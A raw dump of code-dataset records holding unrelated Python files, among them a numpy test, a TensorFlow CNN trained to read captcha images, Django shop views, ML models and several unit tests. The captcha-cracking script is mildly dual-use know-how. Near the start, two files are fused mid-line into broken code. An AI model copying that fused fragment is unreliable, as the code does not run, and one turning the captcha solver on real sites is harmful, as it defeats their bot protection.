npt.assert_array_equal(a, b)\n\n\ndef test_numpy_dtypes_shapes_order():\n for dt in np.sctypes['int'] + np.sctypes['uint'] + np.sctypes['float']:\n a = np.arange(64, dtype=dt)\n roundtrip_ndarray(a)\n a = a.copy().reshape(8, 8)\n roundtrip_ndarray(a)\n a = a.copy().reshape(4, 16)\n roundtrip_ndarray(a)\n a = a.copy().reshape(4, 4, 4)\n roundtrip_ndarray(a)\n a = np.asfortranarray(a)\n nt.assert_true(np.isfortran(a))\n roundtrip_ndarray(a)\n\n # Fixed with string arrays\n a = np.array(['abc', 'def', 'ghi'])\n roundtrip_ndarray(a)\n # This actually get's cast to a fixed width string array\n a = np.array([(1, 'abc'), (2, 'def'), (3, 'ghi')])\n roundtrip_ndarray(a)\n # object arrays\n a = np.array([(1, 'abc'), (2, 'def'), (3, 'ghi')], dtype='object')\n roundtrip_ndarray(a)\n\n # record array\n x = np.array([(1, 'O', 1)],\n dtype=np.dtype([('step', 'int32'),\n ('symbol', '|S1'),\n ('index', 'int32')]))\n roundtrip_ndarray(x)\n\n # and a nested record array\n dt = [('year', ' 2:\n gray = np.mean(img, -1)\n # 上面的转法较快,正规转法如下\n # r, g, b = img[:,:,0], img[:,:,1], img[:,:,2]\n # gray = 0.2989 * r + 0.5870 * g + 0.1140 * b\n return gray\n else:\n return img\n\n\ndef text2vec(text, char2txt_map):\n vec = []\n for idx, char in enumerate(text):\n vec.append(char2txt_map[char])\n\n return np.concatenate(vec).ravel()\n\n\ndef get_next_batch(batch_size):\n batch_x = np.zeros([batch_size, constant.IMAGE_HEIGHT * constant.IMAGE_WIDTH])\n batch_y = np.zeros([batch_size, constant.MAX_CAPTCHA * CHAR_SET_LEN])\n\n for i in range(batch_size):\n text, image = gen_captcha_text_and_image(text_size=1, width=constant.IMAGE_WIDTH, height=constant.IMAGE_HEIGHT)\n image = convert2gray(image)\n\n batch_x[i, :] = image.flatten() / 255 # (image.flatten()-128)/128 mean为0\n char2txt_map = make_char2vec_map(constant.char_set)\n batch_y[i, :] = text2vec(text, char2txt_map)\n # 返回该训练批次\n return batch_x, batch_y\n\n\n# 造300张随机图片\nx = np.zeros([300, constant.IMAGE_HEIGHT * constant.IMAGE_WIDTH])\ny = np.zeros([300, constant.MAX_CAPTCHA * CHAR_SET_LEN])\n\n\ndef get_next_batch_overfit(batch_size):\n for i in range(300):\n text, image = gen_captcha_text_and_image(text_size=1, width=constant.IMAGE_WIDTH, height=constant.IMAGE_HEIGHT)\n image = convert2gray(image)\n x[i, :] = image.flatten() / 255\n char2txt_map = make_char2vec_map(constant.char_set)\n y[i, :] = text2vec(text, char2txt_map)\n\n # 随机给batch_size个\n np.random.shuffle(x)\n np.random.shuffle(y)\n return x[:batch_size], y[:batch_size]\n\n\n####################################################################\n# 申请占位符 按照图片\nX = tf.placeholder(tf.float32, [None, constant.IMAGE_HEIGHT * constant.IMAGE_WIDTH])\nY = tf.placeholder(tf.float32, [None, constant.MAX_CAPTCHA * CHAR_SET_LEN])\nkeep_prob = tf.placeholder(tf.float32) # dropout\n\n\n# 定义CNN\ndef crack_captcha_cnn(w_alpha=0.01, b_alpha=0.1):\n # 将占位符 转换为 按照图片给的新样式\n x = tf.reshape(X, shape=[-1, constant.IMAGE_HEIGHT, constant.IMAGE_WIDTH, 1])\n\n # 3 conv layer\n w_c1 = tf.Variable(w_alpha * tf.random_normal([3, 3, 1, 32])) # 从正太分布输出随机值\n b_c1 = tf.Variable(b_alpha * tf.random_normal([32]))\n # 32个3*3的filter\n conv1 = tf.nn.relu(\n tf.nn.bias_add(tf.nn.conv2d(x, w_c1, strides=[1, 1, 1, 1], padding='SAME'), b_c1)) # (-1, 54, 31, 32)\n # 2*2的max pooling,不重叠\n conv1 = tf.nn.max_pool(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') # (-1, 27, 16, 32)\n variable_summaries(conv1, \"conv1\")\n conv1 = tf.nn.dropout(conv1, keep_prob)\n\n w_c2 = tf.Variable(w_alpha * tf.random_normal([3, 3, 32, 64]))\n b_c2 = tf.Variable(b_alpha * tf.random_normal([64]))\n # 64个3*3的filter\n conv2 = tf.nn.relu(\n tf.nn.bias_add(tf.nn.conv2d(conv1, w_c2, strides=[1, 1, 1, 1], padding='SAME'), b_c2)) # (-1, 27, 16, 64)\n variable_summaries(conv2, \"conv2\")\n # 2*2的max pooling,不重叠\n conv2 = tf.nn.max_pool(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') # (-1, 14, 7, 64)\n conv2 = tf.nn.dropout(conv2, keep_prob)\n\n w_c3 = tf.Variable(w_alpha * tf.random_normal([3, 3, 64, 64]))\n b_c3 = tf.Variable(b_alpha * tf.random_normal([64]))\n # 64个3*3的filter\n conv3 = tf.nn.relu(\n tf.nn.bias_add(tf.nn.conv2d(conv2, w_c3, strides=[1, 1, 1, 1], padding='SAME'), b_c3)) # (-1, 14, 7, 64)\n variable_summaries(conv3, \"conv3\")\n # 2*2的max pooling,不重叠\n conv3 = tf.nn.max_pool(conv3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME') # (-1, 7, 4, 64)\n conv3 = tf.nn.dropout(conv3, keep_prob)\n\n # Fully connected layer\n # 1024个unit的Dense layer\n w_d = tf.Variable(w_alpha * tf.random_normal([7 * 4 * 64, 20]))\n b_d = tf.Variable(b_alpha * tf.random_normal([20]))\n dense = tf.reshape(conv3, [-1, w_d.get_shape().as_list()[0]])\n dense = tf.nn.relu(tf.add(tf.matmul(dense, w_d), b_d))\n dense = tf.nn.dropout(dense, keep_prob)\n\n # logits layer\n w_out = tf.Variable(w_alpha * tf.random_normal([20, constant.MAX_CAPTCHA * CHAR_SET_LEN]))\n b_out = tf.Variable(b_alpha * tf.random_normal([constant.MAX_CAPTCHA * CHAR_SET_LEN]))\n logits = tf.add(tf.matmul(dense, w_out), b_out)\n variable_summaries(logits, \"logits\")\n # out = tf.nn.softmax(out)\n return logits\n\n\n# 训练\ndef train_crack_captcha_cnn():\n logits = crack_captcha_cnn()\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=logits, labels=Y))\n # loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=Y))\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(loss)\n\n predict_position = tf.argmax(tf.reshape(logits, [-1, constant.MAX_CAPTCHA, CHAR_SET_LEN]), 2)\n # variable_summaries(predict_position, \"pre\")\n actual_position = tf.argmax(tf.reshape(Y, [-1, constant.MAX_CAPTCHA, CHAR_SET_LEN]), 2)\n correct_pred = tf.equal(predict_position, actual_position)\n accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n saver = tf.train.Saver()\n merged = tf.summary.merge_all()\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n # 继续上一次\n # model_file = tf.train.latest_checkpoint(model_dir)\n # saver.restore(sess, model_file)\n\n train_writer = tf.summary.FileWriter(\"/tmp/board/captcha\" + '/train', sess.graph)\n\n step = 0\n while True:\n batch_x, batch_y = get_next_batch(64)\n _, loss_, summary = sess.run([optimizer, loss, merged], feed_dict={X: batch_x, Y: batch_y, keep_prob: 0.75})\n print(step, loss_)\n\n # 每100 step计算一次准确率\n if step % 100 == 0:\n batch_x_test, batch_y_test = get_next_batch_overfit(100)\n acc = sess.run(accuracy, feed_dict={X: batch_x_test, Y: batch_y_test, keep_prob: 1.})\n print(step, acc)\n if step % 200 == 0:\n save_path = saver.save(sess, model_dir + \"model.ckpt\", global_step=step)\n print(\"Model saved in path: %s\" % save_path)\n\n train_writer.add_summary(summary, step)\n step += 1\n\n\ndef variable_summaries(var, name):\n \"\"\"Attach a lot of summaries to a Tensor (for TensorBoard visualization).\"\"\"\n with tf.name_scope(name):\n mean = tf.reduce_mean(var)\n tf.summary.scalar('mean', mean)\n # with tf.name_scope('stddev'):\n # stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n # tf.summary.scalar('stddev', stddev)\n tf.summary.scalar('max', tf.reduce_max(var))\n tf.summary.scalar('min', tf.reduce_min(var))\n tf.summary.histogram('histogram', var)\n\n\nif __name__ == '__main__':\n train_crack_captcha_cnn()\n","sub_path":"overfit.py","file_name":"overfit.py","file_ext":"py","file_size_in_byte":7437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"446629819","text":"import os\nimport json\nfrom django.test import TestCase\nfrom casexml.apps.case.tests import delete_all_cases\nfrom corehq.apps.commtrack.models import Product, RequisitionCase\nfrom custom.openlmis.api import Program\nfrom custom.openlmis.commtrack import bootstrap_domain, sync_openlmis_program, sync_openlmis_product, sync_requisition_from_openlmis\nfrom custom.openlmis.tests import MockOpenLMISEndpoint\n\nTEST_DOMAIN = 'openlmis-commtrack-program-test'\n\nclass RequisitionSyncTest(TestCase):\n\n def setUp(self):\n self.datapath = os.path.join(os.path.dirname(__file__), 'data')\n self.api = MockOpenLMISEndpoint(\"uri://mock/lmis/endpoint\", username='ned', password='honor')\n bootstrap_domain(TEST_DOMAIN)\n delete_all_cases()\n for product in Product.by_domain(TEST_DOMAIN):\n product.delete()\n\n def testSyncRequisition(self):\n with open(os.path.join(self.datapath, 'sample_program.json')) as f:\n lmis_program = Program.from_json(json.loads(f.read()))\n commtrack_program = sync_openlmis_program(TEST_DOMAIN, lmis_program)\n test_product = {\n 'name': 'Test',\n 'code': 'P151',\n 'unit': 10,\n 'description': 'decs',\n 'category': 'category',\n }\n sync_openlmis_product(TEST_DOMAIN, commtrack_program, test_product)\n sync_requisition_from_openlmis(TEST_DOMAIN, 1, self.api)\n self.assertTrue(1, len(RequisitionCase.get_by_external(TEST_DOMAIN, 1)))","sub_path":"custom/openlmis/tests/test_requisition_sync.py","file_name":"test_requisition_sync.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"462810835","text":"#!/usr/bin/env python3\n\nimport sys\nimport json\nimport argparse\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'data', metavar='data.json',\n help='Data to convert to dataset'\n )\n parser.add_argument(\n 'answers', metavar='answers.json',\n help='Answers to store gold standard in the dataset'\n )\n parser.add_argument(\n '-o', '--output', default=None,\n help='Output file to write dataset (default stdout)'\n )\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n return parser.parse_args()\n\n\n\"\"\"\n gold_answers\n \"f001_0\": \"3\", ...\n race format:\n \"C\"\n\"\"\"\n\n\ndef merge_data_with_labels(data, gold_answers, strict_nof_options=4):\n dataset = []\n nof_questions = 0\n skipped_questions = 0\n gold_keys = list(gold_answers.keys())\n for id, item in data.items():\n questions, options, answers, article = [], [], [], None\n for q_id, question_data in item['questions'].items():\n nof_questions += 1\n answer_opts = list(question_data['answers'].values())\n if q_id not in gold_keys:\n print('Skipping: ', q_id, 'gold_keys')\n skipped_questions += 1\n continue\n elif strict_nof_options > 0:\n if len(answer_opts) != strict_nof_options:\n print(\n 'Skipping: ', q_id,\n 'strict_nof_options', len(answer_opts)\n )\n skipped_questions += 1\n continue\n\n questions.append(question_data['question'])\n options.append(answer_opts)\n answers.append(chr(ord('A') + int(gold_answers[q_id])))\n\n article = item['context']\n assert(len(questions) == len(options) == len(answers))\n example = dict(\n id=id, questions=questions,\n options=options, answers=answers, article=article\n )\n dataset.append(example)\n\n return dataset, skipped_questions, nof_questions\n\n\ndef prepare_gold_answers(answers):\n # dev split has ids accessed through topics: Eg: Belief_states,\n # Entitiy_properties... see the paper:\n # https://aaai.org/Papers/AAAI/2020GB/AAAI-RogersA.7778.pdf\n gold_answers = {}\n first_key = list(answers.keys())[0]\n if type(answers[first_key]) == dict:\n # dev collection\n for golds in answers.values():\n gold_answers.update(golds)\n else:\n gold_answers = answers\n return gold_answers\n\n\ndef main(args):\n questions = json.load(open(args.data, 'r'))\n answers = json.load(open(args.answers, 'r'))\n gold_answers = prepare_gold_answers(answers['data'])\n dataset, skipped, total = merge_data_with_labels(\n questions['data'],\n gold_answers\n )\n data = dict(version=questions['version'], data=dataset)\n data_print = json.dumps(obj=data, ensure_ascii=False) + '\\n'\n if args.output is None:\n print(data)\n else:\n print('Skipped {}/{} documents.'.format(skipped, total))\n with open(args.output, 'w') as fstream:\n fstream.write(data_print)\n\n\nif __name__ == '__main__':\n args = parse_args()\n main(args)\n","sub_path":"src/etl/preprocess_quail_to_race.py","file_name":"preprocess_quail_to_race.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"544810721","text":"''' In determinate occasioni ci capita di dover scrivere i numeri in lettere, \nad esempio quando dobbiamo compilare un assegno. \nPuo' capitare che alcuni numeri facciano sorgere in noi qualche dubbio.\n\nLe perplessita' nascono soprattutto nella scrittura dei numeri composti con 1 e 8. \nTutti i numeri come venti, trenta, quaranta, cinquanta, ecc... elidono la vocale \nfinale (la \"i\" per 20, la \"a\" per tutti gli altri) fondendola con la vocale iniziale \ndel numero successivo; scriveremo quindi ventuno, ventotto, trentotto, \ncinquantuno ecc...\n\nIl numero cento, nella formazione dei numeri composti con uno e otto, non si comporta \ncosi'; il numero \"cento\" e tutte le centinaia (duecento, trecento, ecc...), \ninfatti, non elidono la vocale finale. Dunque non scriveremo centuno, trecentotto ma centouno, \ntrecentootto, ecc...\n\nI numeri composti dalle centinaia e dalla decina \"ottanta\" invece tornano ad elidere \nla vocale finale; scriveremo quindi centottanta, duecentottanta, ecc..., \nnon centoottanta, duecentoottanta, ...\n\nIl numero \"mille\" non elide in nessun numero composto la vocale finale; scriveremo \nquindi milleuno, milleotto, milleottanta, ecc...\n\nAltri esempi sono elencati nel file grade02.txt\n\n\nScrivere una funzione conv(n) che prende in input un intero n, con 0[0-9A-z-_.]+)/?\", comment, re.I)\n if urls_in_comment and any(map(lambda x: x != 'past-indicator.com', urls_in_comment)):\n return self.form_invalid(form)\n\n messages.success(self.request, _(u'''We are allow your callback request'''))\n \n self.request.session['callback'] = True\n self.request.session.save()\n response = super(CallBackView, self).form_valid(form)\n send_new_offer_mail(self.object)\n return response\n\n\ndef cart_view(request):\n template_name = 'shop/cart.html'\n cart = Cart(request)\n cart.check()\n cart_data = cart.with_products\n products_formset = formset_factory(forms.AddToCartForm, extra=0, can_delete=True)\n formset = products_formset(initial=cart_data)\n if request.method.lower() == 'post':\n if 'send' not in request.POST:\n formset = products_formset(request.POST, initial=cart_data)\n if formset.is_valid():\n if any(['DELETE' in name for name in request.POST.keys()]):\n [cart.del_item(form.cleaned_data['product'].id) for form in formset.deleted_forms]\n formset = products_formset(initial=cart.with_products)\n elif request.POST.get('calculate'):\n cart.with_messages = False\n [cart.__setitem__(form.cleaned_data['product'].id, form.cleaned_data['count'])\n for form in formset]\n cart.save()\n\n if not cart.count:\n messages.error(request, _(u'Your cart is empty. Choose the clock and add them to your cart'))\n return redirect('shop:main')\n from .checkout import checkout_api # todo: remove\n context = {\n 'checkout_ticket': checkout_api.ticket if not settings.DEBUG else 'test', # todo: remove\n 'formset': formset,\n }\n return render(request, template_name, context)\n\n\nclass ClientView(FormView):\n template_name = 'shop/checkout.html'\n form_class = forms.CheckOutForm\n success_url = 'delivery'\n\n def form_valid(self, form):\n if form.cleaned_data['country'] != forms.CheckOutForm.RUS:\n self.success_url = 'payment'\n return super(ClientView, self).form_valid(form)\n\n\nclass DeliveryView(FormView):\n template_name = 'shop/delivery.html'\n form_class = forms.OrderDeliverySelectForm\n success_url = 'cart'\n\n @cached_property\n def address_form(self):\n return forms.AddressForm(self.request.POST if self.request.POST else None)","sub_path":"core/shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"627410447","text":"import os\r\nimport re\r\nimport random\r\n\r\n\r\ndef finder():\r\n dict = {}\r\n counter = 0\r\n score = 0\r\n path = \"C:\\\\Users\\\\Vanek\\\\Desktop\\\\Vocalubary\\\\Dictionary\"\r\n attempts = int(input(\"Сколько раз повторять: \"))\r\n while attempts < 0 or attempts > 500:\r\n attempts = int(input(\"Сколько раз повторять: \"))\r\n letterNumber = int(input(\"Номер буквы: \"))\r\n while letterNumber < 0 or letterNumber > 25:\r\n letterNumber = int(input(\"Номер буквы: \"))\r\n for file in os.listdir(path):\r\n if counter != letterNumber:\r\n counter += 1\r\n continue\r\n filename = os.fsdecode(file)\r\n print(f'Файл: {filename}')\r\n with open(path + \"\\\\\" + filename, encoding='utf-8') as f:\r\n content = f.readlines()\r\n if (len(content) < 2):\r\n break\r\n for line in content:\r\n english_word = line.split('-')[0]\r\n translate_word = str(''.join(line.split('-')[2:]))\r\n if len(translate_word) == 0:\r\n translate_word = str(''.join(line.split('-')[1:]))\r\n english_word = str(re.sub(r'[^a-zA-Z]', '', english_word))\r\n vocalubary_string = [(english_word, translate_word)]\r\n dict.update(vocalubary_string)\r\n break\r\n words = list(dict.keys())\r\n translations = list(dict.values())\r\n for i in range(0, attempts):\r\n randomNumber = random.randint(0, len(words))\r\n print(f'Слово: {translations[randomNumber]}')\r\n answer = input(\"Введите правильный перевод: \")\r\n os.system('CLS')\r\n if answer.lower().replace(' ', '') == words[randomNumber].lower().replace(' ', ''):\r\n score += 1\r\n print(f'\\nПравильно, {words[randomNumber].lower()}\\n')\r\n else:\r\n print(f'\\nНеправильно, надо {words[randomNumber].lower()}\\n')\r\n os.system('CLS')\r\n print(f\"\\nВаш счёт: {score} из {attempts}\")\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n finder()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"178069225","text":"from torch import nn\nfrom torch.autograd import Variable\n\nclass VAE(nn.Module) :\n\n def __init__(self, input_dim, zdims, h_num):\n super(VAE, self).__init__()\n \n self.input_dim = input_dim\n self.h_num = h_num\n self.zdims = zdims\n self.leakyrelu = nn.LeakyReLU()\n self.sigmoid = nn.Sigmoid()\n \n \n # h_num = 1\n if self.h_num == 1 :\n # Encoder\n self.h1dim = round((self.input_dim+self.zdims) * (1/2))\n self.fc1 = nn.Linear(input_dim, self.h1dim)\n self.fc21 = nn.Linear(self.h1dim, self.zdims) # mu\n self.fc22 = nn.Linear(self.h1dim, self.zdims) # log_var \n # Decoder\n self.fc3 = nn.Linear(self.zdims, self.h1dim)\n self.fc4 = nn.Linear(self.h1dim, self.input_dim) # from latent space to output\n \n # h_num = 2 :\n if self.h_num == 2 :\n # Encoder\n self.h1dim = round((self.input_dim+self.zdims) * (2/3))\n self.h2dim = round((self.input_dim+self.zdims) * (1/3))\n self.fc1 = nn.Linear(input_dim, self.h1dim)\n self.fc2 = nn.Linear(self.h1dim, self.h2dim)\n self.fc31 = nn.Linear(self.h2dim, self.zdims)\n self.fc32 = nn.Linear(self.h2dim, self.zdims)\n # Decoder\n self.fc4 = nn.Linear(self.zdims, self.h2dim)\n self.fc5 = nn.Linear(self.h2dim, self.h1dim)\n self.fc6 = nn.Linear(self.h1dim, self.input_dim)\n \n \n def encode(self, x) :\n if self.h_num == 1 :\n h1 = self.leakyrelu(self.fc1(x))\n return self.fc21(h1), self.fc22(h1) # returns mu, log_var\n if self.h_num == 2 :\n h1 = self.leakyrelu(self.fc1(x))\n h2 = self.leakyrelu(self.fc2(h1))\n return self.fc31(h2), self.fc32(h2)\n \n def reparametrize(self, mu, logvar) : \n if self.training :\n std = logvar.mul(0.5).exp_() # log_var\n eps = Variable(std.data.new(std.size()).normal_())\n # for training, which enalbes backpropagation\n return eps.mul(std).add_(mu)\n \n else :\n # for inference, just use mu ?????\n return mu\n \n def decode(self, z) :\n if self.h_num == 1 :\n h3 = self.leakyrelu(self.fc3(z))\n return self.sigmoid(self.fc4(h3)) # final output, reconstruction of mnist image\n if self.h_num == 2 :\n h4 = self.leakyrelu(self.fc4(z))\n h5 = self.leakyrelu(self.fc5(h4))\n return self.sigmoid(self.fc6(h5))\n \n def forward(self, x) :\n mu, logvar = self.encode(x.view(-1, self.input_dim))\n z = self.reparametrize(mu, logvar)\n return self.decode(z), mu, logvar\n ","sub_path":"KU-BIG(빅데이터 학회)/Outlier Detction(AVE)/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"295464230","text":"import csv\n\ndata = csv.reader(open(r'e:\\Data_VB\\wrds_directorship_2008.csv','r'))\nheader = data.next()\nheader.append('YEAR')\nlines = ','.join(header)+'\\n'\nfor row in data:\n\trow.append('2008')\n\trow = '\"' + '\",\"'.join(row)+'\"\\n'\n\tlines = lines + row\nopen(r'e:\\Data_VB\\wrds_directorship_2008_updated.csv','w').writelines(lines)\n","sub_path":"AddAttributeYear.py","file_name":"AddAttributeYear.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"511261259","text":"import pytest\n\nfrom tox_ansible.ansible.scenario import Scenario\nfrom tox_ansible.options import Options\nfrom tox_ansible.tox_helper import Tox\nfrom tox_ansible.tox_molecule_case import ToxMoleculeCase\n\nDOCKER_DRIVER = {\"driver\": {\"name\": \"docker\"}}\nOPENSTACK_DRIVER = {\"driver\": {\"name\": \"openstack\"}}\nBASE_DEPS = [\n \"ansible-lint\",\n \"flake8\",\n \"pytest\",\n \"testinfra\",\n \"yamllint\",\n \"boto\",\n \"boto3\",\n \"molecule\",\n \"molecule-containers\",\n \"molecule-docker\",\n \"molecule-ec2\",\n \"molecule-openstack\",\n \"molecule-podman\",\n \"molecule-vagrant\",\n \"openstacksdk\",\n \"os-client-config\",\n]\n\n\n@pytest.fixture\ndef config(mocker):\n return mocker.PropertyMock(return_value={})\n\n\n@pytest.fixture\ndef scenario():\n return Scenario(\"molecule/my_test\")\n\n\n@pytest.fixture\ndef opts(mocker):\n config = mocker.Mock()\n reader = mocker.Mock()\n config.get_reader.return_value = reader\n reader.getlist.return_value = [\"2.10\", \"3.9\"]\n return Options(config)\n\n\ndef test_case_is_simple(config, opts, scenario, mocker):\n mocker.patch.object(Options, \"get_global_opts\", return_value=[])\n mocker.patch.object(\n Tox, \"posargs\", new_callable=mocker.PropertyMock, return_value=[]\n )\n t = ToxMoleculeCase(scenario)\n assert t.get_name() == \"my_test\"\n assert t.get_working_dir() == \"\"\n assert sorted(t.get_dependencies()) == sorted(BASE_DEPS + [\"ansible\"])\n cmds = [[\"molecule\", \"test\", \"-s\", scenario.name]]\n assert t.get_commands(opts) == cmds\n assert t.get_basepython() is None\n\n\ndef test_case_has_global_opts(mocker, scenario, opts, config):\n mocker.patch.object(Options, \"get_global_opts\", return_value=[\"-c\", \"derp\"])\n mocker.patch.object(\n Tox, \"posargs\", new_callable=mocker.PropertyMock, return_value=[]\n )\n t = ToxMoleculeCase(scenario)\n cmds = [[\"molecule\", \"-c\", \"derp\", \"test\", \"-s\", scenario.name]]\n assert t.get_commands(opts) == cmds\n\n\ndef test_case_expand_ansible(scenario):\n # pylint: disable=misplaced-comparison-constant\n t = ToxMoleculeCase(scenario)\n ts = t.expand_ansible(\"2.7\")\n assert ts.ansible == \"2.7\"\n assert ts.get_name() == \"ansible27-my_test\"\n assert sorted(ts.get_dependencies()) == sorted(BASE_DEPS + [\"ansible==2.7.*\"])\n assert ts.get_basepython() is None\n assert \"Auto-generated for: molecule test -s my_test\" == ts.description\n\n\ndef test_case_expand_python(scenario):\n t = ToxMoleculeCase(scenario)\n ts = t.expand_python(\"4.1\")\n assert ts.python == \"4.1\"\n assert ts.get_name() == \"py41-my_test\"\n assert ts.get_basepython() == \"python4.1\"\n\n\ndef test_case_expand_twice(scenario):\n t = ToxMoleculeCase(scenario)\n t1 = t.expand_python(\"4.1\")\n t2 = t1.expand_ansible(\"1.0\")\n assert t2.get_name() == \"ansible10-py41-my_test\"\n\n\ndef test_case_includes_docker_deps(mocker):\n mocker.patch.object(\n Scenario, \"driver\", new_callable=mocker.PropertyMock, return_value=\"docker\"\n )\n s = Scenario(\"molecule/my_test\")\n t = ToxMoleculeCase(s)\n assert \"molecule-docker\" in t.get_dependencies()\n\n\ndef test_case_includes_openstack_deps(mocker):\n mocker.patch.object(\n Scenario, \"driver\", new_callable=mocker.PropertyMock, return_value=\"openstack\"\n )\n s = Scenario(\"molecule/osp_test\")\n t = ToxMoleculeCase(s)\n assert \"openstacksdk\" in t.get_dependencies()\n","sub_path":"tests/test_tox_molecule_case.py","file_name":"test_tox_molecule_case.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"546994705","text":"import tensorflow as tf\nfrom set_operations import cartesian_product, nn_inner_prod\n\nclass SetNN(object):\n def __init__(\n self, \n input, \n layer_sizes=[(17, 7), (13, 7), (9, 7)], \n out_size=4, \n num_layers=3\n ):\n self.input = input\n self.layer_sizes = layer_sizes\n self.out_size = out_size\n self.num_layers = num_layers\n\n def build_tensorflow_model(self):\n in_size = 3\n output = self.input\n for layer in range(self.num_layers):\n with tf.variable_scope(\n \"single_set{}\".format(layer), reuse=tf.AUTO_REUSE\n ) as scope:\n output = self._layer(\n output, self.layer_sizes[layer], self.out_size, in_size\n )\n in_size = self.out_size\n \n return tf.reduce_mean(output, axis=[1], name=\"final_output\")\n\n def _layer(self, input, param_set, units, in_size):\n raise Exception(\"_layer method must be implemented\")\n\nclass Single_SetNN(SetNN):\n def _layer(self, input, param_set, units, in_size=4):\n m, n = param_set\n weight = tf.get_variable(\"weight\", [m, n], dtype=tf.float32)\n in_dim, out_dim = (tf.shape(input)[1], m)\n \n input,weight = cartesian_product(input, weight)\n\n product = tf.concat([input, weight], 2)\n nn_prod = nn_inner_prod(product, units, in_size+n)\n nn_prod = tf.reshape(\n nn_prod, [tf.shape(nn_prod)[0], in_dim, out_dim, tf.shape(nn_prod)[2]]\n )\n\n return tf.reduce_max(nn_prod, axis=[1], name=\"reduce\")\n\ndef set_set_network(input):\n with tf.variable_scope('set_set1'):\n output1 = layer(input, 12, 5, 3)\n with tf.variable_scope('set_set2'):\n output2 = layer(output1, 40, 20, 3)\n with tf.variable_scope('set_set3'):\n output3 = layer(output2, 50, 100, 3)\n with tf.variable_scope('set_set4'):\n final_output = fc_layer(output3, 35, 20, 3)\n\n return final_output\n\ndef layer(input, f, m, n):\n filters = []\n\n for i in range(f):\n key = \"_\" + str(i)\n weight = tf.get_variable(\"weight\"+key, [m, n], dtype=tf.float32, initializer=tf.initializers.random_normal)\n\n input,weight = cartesian_product(input, weight)\n\n product = tf.cross(input, weight, name=\"cross\"+key)\n inner_prod = tf.reduce_mean(product, axis=[1], name=\"reduce\"+key)\n\n filters.append(inner_prod)\n\n return tf.nn.relu(tf.transpose(tf.stack(filters), perm=[1, 0, 2])) \n\ndef fc_layer(input, f, m, n):\n result = layer(input, f, m, n)\n\n return tf.nn.relu(tf.reduce_mean(result, axis=[2]), name=\"fc_layer\")\n\nif __name__ == '__main__':\n with tf.Session() as s:\n input = tf.get_variable(\"input\", [5, 100, 3], dtype=tf.float32)\n print(Single_SetNN(input).build_tensorflow_model())\n for op in tf.get_default_graph().get_operations():\n print(str(op.name))\n","sub_path":"setlearn/experiments/NN_Set.py","file_name":"NN_Set.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"33644172","text":"\"\"\"\n:Copyright: 2006-2019 Jochen Kupperschmidt\n:License: Modified BSD, see LICENSE for details.\n\"\"\"\n\nfrom byceps.typing import UserID\n\nfrom byceps.services.user import command_service as user_command_service\nfrom byceps.services.user import event_service\nfrom byceps.services.user import service as user_service\n\nfrom tests.base import AbstractAppTestCase\nfrom tests.helpers import create_user\n\n\nADMIN_ID = UserID('5a4e04b4-7258-4e61-9f36-090baa683150')\n\n\nclass UserSuspendedFlagTest(AbstractAppTestCase):\n\n def setUp(self):\n super().setUp()\n\n self.user = create_user()\n\n def test_suspend(self):\n reason = 'User has been caught cheating.'\n\n user_before = user_service.find_user(self.user.id)\n assert not user_before.suspended\n\n events_before = event_service.get_events_for_user(user_before.id)\n assert len(events_before) == 0\n\n # -------------------------------- #\n\n user_command_service.suspend_account(self.user.id, ADMIN_ID, reason)\n\n # -------------------------------- #\n\n user_after = user_service.find_user(self.user.id)\n assert user_after.suspended\n\n events_after = event_service.get_events_for_user(user_after.id)\n assert len(events_after) == 1\n\n suspended_event = events_after[0]\n assert suspended_event.event_type == 'user-suspended'\n assert suspended_event.data == {\n 'initiator_id': str(ADMIN_ID),\n 'reason': reason,\n }\n\n def test_unsuspend(self):\n user_command_service.suspend_account(self.user.id, ADMIN_ID, 'Annoying')\n\n reason = 'User showed penitence. Drop the ban.'\n\n user_before = user_service.find_user(self.user.id)\n assert user_before.suspended\n\n events_before = event_service.get_events_for_user(user_before.id)\n assert len(events_before) == 1\n\n # -------------------------------- #\n\n user_command_service.unsuspend_account(self.user.id, ADMIN_ID, reason)\n\n # -------------------------------- #\n\n user_after = user_service.find_user(self.user.id)\n assert not user_after.suspended\n\n events_after = event_service.get_events_for_user(user_after.id)\n assert len(events_after) == 2\n\n unsuspended_event = events_after[1]\n assert unsuspended_event.event_type == 'user-unsuspended'\n assert unsuspended_event.data == {\n 'initiator_id': str(ADMIN_ID),\n 'reason': reason,\n 